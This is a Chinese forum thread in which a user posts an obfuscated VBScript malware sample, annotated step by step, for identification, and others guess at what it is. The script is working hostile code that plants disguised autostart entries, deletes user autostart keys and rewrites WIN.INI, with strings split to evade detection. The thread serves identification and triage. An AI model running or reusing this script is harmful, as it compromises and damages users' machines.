![]() | 作者: tyjhw [tyjhw]
' Script sample posted to the forum for identification. Statement breaks are
' restored here; the code tokens are as posted.
'
' What the visible code does, in order:
'   1. Creates a WScript.Shell object.
'   2. Writes two values under the HKLM ...\CurrentVersion\Run key that are NOT
'      removed again later in the script: "WlN32" and "internat.exe".
'   3. Writes and then deletes a long list of other value names under the same
'      key, deletes the HKCU ...\Run key and the HKLM ...\RunOnce key.
'   4. Rewrites c:\windows\WIN.INI around its load= / run= entries.
'
' Triage note: on a host where this ran, the artefacts left behind by the
' visible code are the two Run values from step 2 and the file path named in
' the "WlN32" data. What those targets contain is not shown on this page.
'
' Every ProgID, registry path and file path is split into fragments that are
' joined at run time, so a literal search for the full string does not match
' this text (presumably to avoid simple string matching). Normalise the
' concatenations before matching on content.
Set sss = CreateObject("WSc" + "ript.Sh" + "ell")

' mhk  -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
' mhc  -> HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
' mhk2 -> HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
mhk="HK"&"LM\SO"&"FTWARE\Mi"&"cr"&"os"&"oft\Win"&"dows\Cu"&"rren"&"tVersion\Run\"
mhc="H"&"K"&"CU\So"&"ft"&"ware\Mic"&"ros"&"oft\Win"&"dows\Curren"&"tVersion\Run\"
mhk2="HK"&"LM\SO"&"FT"&"WARE\M"&"icr"&"osoft\Wi"&"n"&"dows\Curren"&"tVersion\"

' Autostart value "WlN32" (lower-case L in place of I). Its data runs
' "regedit -s", which imports a registration file without a prompt; the file
' carries a .cer extension and sits in a directory named like a hotfix
' uninstall folder. Neither this value nor "internat.exe" below appears in the
' RegDelete list further down, so both remain after the script finishes.
sss.RegWrite ""&mhk&"WlN32","regedit -s C:\$NtUninstallQ887678$\WINSYS.cer"
sss.RegWrite ""&mhk&"internat.exe","internat.exe"

' The following names are each written with the placeholder data "12" and are
' deleted again below. No "On Error Resume Next" is visible, so the write is
' presumably there to keep RegDelete from failing on a name that does not
' exist. Net effect: these names are absent from the Run key afterwards.
' Several are look-alikes of the value kept above ("WIN32", "W1N32").
sss.RegWrite ""&mhk&"zwupdows","12"
sss.RegWrite ""&mhk&"win","12"
sss.RegWrite ""&mhk&"mwin","12"
sss.RegWrite ""&mhk&"internt","12"
sss.RegWrite ""&mhk&"Inernet","12"
sss.RegWrite ""&mhk&"Internet","12"
sss.RegWrite ""&mhk&"iexpleror","12"
sss.RegWrite ""&mhk&"zxdows","12"
sss.RegWrite ""&mhk&"qwe","12"
sss.RegWrite ""&mhk&"win1","12"
sss.RegWrite ""&mhk&"intelnat.exe","12"
sss.RegWrite ""&mhk&"u1888","12"
sss.RegWrite ""&mhk&"intenet","12"
sss.RegWrite ""&mhk&"9i5zxdows","12"
sss.RegWrite ""&mhk&"9i5com01zxdows","12"
sss.RegWrite ""&mhk&"99zxdows","12"
sss.RegWrite ""&mhk&"88zxdows","12"
sss.RegWrite ""&mhk&"Start Pagewin","12"
sss.RegWrite ""&mhk&"Start Page","12"
sss.RegWrite ""&mhk&"u188","12"
sss.RegWrite ""&mhk&"9i5comzxdows","12"
sss.RegWrite ""&mhk&"9q5zxdows","12"
sss.RegWrite ""&mhk&"u1881","12"
sss.RegWrite ""&mhk&"u1882","12"
sss.RegWrite ""&mhk&"u1883","12"
sss.RegWrite ""&mhk&"u1884","12"
sss.RegWrite ""&mhk&"u1885","12"
sss.RegWrite ""&mhk&"u1886","12"
sss.RegWrite ""&mhk&"u1887","12"
sss.RegWrite ""&mhk&"u88y", "12"
sss.RegWrite ""&mhk&"flash", "12"
sss.RegWrite ""&mhk&"999izxdows","12"
sss.RegWrite ""&mhk&"033zxdows","12"
sss.RegWrite ""&mhk&"syste","12"
' Written under the HKCU Run key (mhc), not HKLM; that whole key is deleted below.
sss.RegWrite ""&mhc&"my","12"
sss.RegWrite ""&mhk&"3zxdows","12"
sss.RegWrite ""&mhk&"88u88","12"
sss.RegWrite ""&mhk&"system","12"
sss.RegWrite ""&mhk&"8zxdows","12"
sss.RegWrite ""&mhk&"u18","12"
sss.RegWrite ""&mhk&"interneet.exe","12"
' Name ends in a backslash, so this addresses the RunOnce key itself
' (its default value) rather than a named value.
sss.RegWrite ""&mhk2&"RunOnce\", "12"
sss.RegWrite ""&mhk&"iexpler", "12"
sss.RegWrite ""&mhk&"u1810", "12"
sss.RegWrite ""&mhk&"winwin", "12"
sss.RegWrite ""&mhk&"WIN32", "12"
sss.RegWrite ""&mhk&"W1N32", "12"

' mhc ends in a backslash: this removes the current user's Run key as a whole,
' i.e. every per-user autostart entry that was registered there.
sss.RegDelete ""&mhc&""
' Removal of the placeholder names written above. "inernet" differs from the
' written "Inernet" only in case.
sss.RegDelete ""&mhk&"zwupdows"
sss.RegDelete ""&mhk&"win"
sss.RegDelete ""&mhk&"mwin"
sss.RegDelete ""&mhk&"internt"
sss.RegDelete ""&mhk&"inernet"
sss.RegDelete ""&mhk&"Internet"
sss.RegDelete ""&mhk&"u188"
sss.RegDelete ""&mhk&"iexpleror"
sss.RegDelete ""&mhk&"zxdows"
sss.RegDelete ""&mhk&"qwe"
sss.RegDelete ""&mhk&"win1"
sss.RegDelete ""&mhk&"intelnat.exe"
sss.RegDelete ""&mhk&"intenet"
sss.RegDelete ""&mhk&"9i5zxdows"
sss.RegDelete ""&mhk&"9i5com01zxdows"
sss.RegDelete ""&mhk&"99zxdows"
sss.RegDelete ""&mhk&"88zxdows"
sss.RegDelete ""&mhk&"Start Pagewin"
sss.RegDelete ""&mhk&"Start Page"
sss.RegDelete ""&mhk&"9i5comzxdows"
sss.RegDelete ""&mhk&"9q5zxdows"
sss.RegDelete ""&mhk&"999izxdows"
sss.RegDelete ""&mhk&"033zxdows"
sss.RegDelete ""&mhk&"u1881"
sss.RegDelete ""&mhk&"u1882"
sss.RegDelete ""&mhk&"u1883"
sss.RegDelete ""&mhk&"u1884"
sss.RegDelete ""&mhk&"u1885"
sss.RegDelete ""&mhk&"u1886"
sss.RegDelete ""&mhk&"u1887"
sss.RegDelete ""&mhk&"u88y"
sss.RegDelete ""&mhk&"flash"
sss.RegDelete ""&mhk&"88u88"
sss.RegDelete ""&mhk&"interneet.exe"
sss.RegDelete ""&mhk&"u18"
sss.RegDelete ""&mhk&"u1888"
sss.RegDelete ""&mhk&"system"
sss.RegDelete ""&mhk&"3zxdows"
sss.RegDelete ""&mhk&"8zxdows"
sss.RegDelete ""&mhk&"syste"
' Trailing backslash again: the HKLM RunOnce key is deleted as a key.
sss.RegDelete ""&mhk2&"RunOnce\"
sss.RegDelete ""&mhk&"iexpler"
sss.RegDelete ""&mhk&"u1810"
sss.RegDelete ""&mhk&"winwin"
sss.RegDelete ""&mhk&"WIN32"
sss.RegDelete ""&mhk&"W1N32"

' Second stage: rewrite of c:\windows\WIN.INI (path is hard-coded; a Windows
' directory elsewhere is not touched). WIN.INI's load= and run= lines are a
' legacy autostart location.
Set FSO = CreateObject("Scrip" + "ting." + "FileSyst" + "emO" + "bject")
myfile14=FSO.FileExists("c:\wind" + "ows\W" + "IN.INI")
if myfile14 then
    set FSO2=FSO.OpenTextFile("c:\win" + "dows\W" + "IN.INI")
    mywin=FSO2.ReadALL()
    ' InStr returns 0 when the text is not found, which makes l, m and n
    ' negative; the ">0" tests below then skip the rewrite.
    ' The -3 / -1 offsets look like they assume a CR+LF pair in front of
    ' "run=" and "NullPort=" -- TODO confirm against a real WIN.INI.
    l=Instr(mywin,"run=")-3
    m=Instr(mywin,"load=")-1
    n=Instr(mywin,"NullPort=")-3
    FSO2.close
    ' Only proceeds when both entries exist and "run=" comes after "load=".
    if l>0 and m>0 and l>m then
        ' mywin2 = first l characters of the file (up to shortly before "run=").
        set FSO3=FSO.OpenTextFile("c:\wi" + "ndows\W" + "IN.INI")
        mywin2=FSO3.Read(l)
        FSO3.close
        ' mywin3 = first m characters of the file (everything before "load=").
        set FSO4=FSO.OpenTextFile("c:\win" + "dows\WI" + "N.INI")
        mywin3=FSO4.Read(m)
        FSO4.close
        if n>0 and n>l then
            ' "NullPort=" follows "run=": the file is rebuilt as
            '   <text before load=> + "load=" line + "run=" + <text from just before NullPort=>
            ' so whatever stood after load= and run= is dropped.
            set FSO5=FSO.OpenTextFile("c:\wind" + "ows\WIN" + ".INI")
            mywin4=FSO5.Read(n)
            FSO5.close
            ' Replace removes every occurrence of the prefix text, not only the leading one.
            mywin=Replace(mywin,mywin4,"")
            set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
            FSO2.Write mywin3
            FSO2.WriteLine "load="
            FSO2.Write "run="
            FSO2.Write mywin
            FSO2.close
        else
            ' No usable "NullPort=" position: the file is rebuilt as
            '   <text before load=> + "load=" + <text from just before run=>
            ' so the load= entry is emptied and the run= line is kept as found.
            mywin=Replace(mywin,mywin2,"")
            set FSO2=FSO.CreateTextFile("c:\win" + "dows\WI" + "N.INI")
            FSO2.Write mywin3
            FSO2.Write "load="
            FSO2.Write mywin
            FSO2.close
        end if
    end if
end if
好象是个盗qq的 |
地主 发表时间: 11/12 18:36 |
![]() | 回复: tyjhw [tyjhw] ![]() |
没人知道吗 |
B1层 发表时间: 11/13 16:33 |
![]() | 回复: zhangyun [zhangyun] ![]() |
看天书啊・!!!!!!!!!! |
B2层 发表时间: 11/13 22:30 |
![]() | 回复: flyfalcon [flyfalcon] ![]() |
好像是VBS代码,写进注册表的 |
B3层 发表时间: 11/14 12:57 |
![]() | 回复: fsfsfsaf [fsfsfsaf] ![]() |
有什么症状吗?我可以确定是VBS写的,是调用自做的COM |
B4层 发表时间: 11/16 21:35 |
![]() | 回复: tyjhw [tyjhw] ![]() |
我第一时间删除了 你说能有什么症状 |
B5层 发表时间: 12/18 05:46 |
![]() | 回复: yangcheng [yangcheng] ![]() |
天书! |
B6层 发表时间: 12/18 10:11 |
![]() | 回复: ghame [ghame] ![]() |
这段代码的作用是在你机器的注册表HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN中写入若干值,以实现某些程序的开机自动运行。 然后将你注册表中的HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN删除。 然后在HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION中删除若干个值。 修改完注册表以后开始检测你的WINDOWS文件夹里是否存在WIN.INI文件,如存在就在此文件中找寻RUN、LOAD、NULLPORT三个字段,并修改你原来的这个文件。 [此贴被 ghame(ghame) 在 12月19日19时18分 编辑过] |
B7层 发表时间: 12/19 19:01 |
![]() | 回复: yangxius [yangxius] ![]() |
利用这个程序,往注册表里边写入一些自动运行的值,而且还删除了原来的自动运行的程序,好象是一个木马,大概能够利用QQ打开一个后门。 |
B8层 发表时间: 12/20 09:37 |
![]() | 回复: zhb7769 [zhb7769] ![]() |
你是怎么知道这个病毒的源代码的?我怎么不会,5555555![]() |
B9层 发表时间: 12/20 20:59 |
![]() | 回复: leonshoh [leonshoh] ![]() |
好象是XX的网页病毒,看起来有点老套,没有代码加密~ |
B10层 发表时间: 03-12-25 11:20 |
|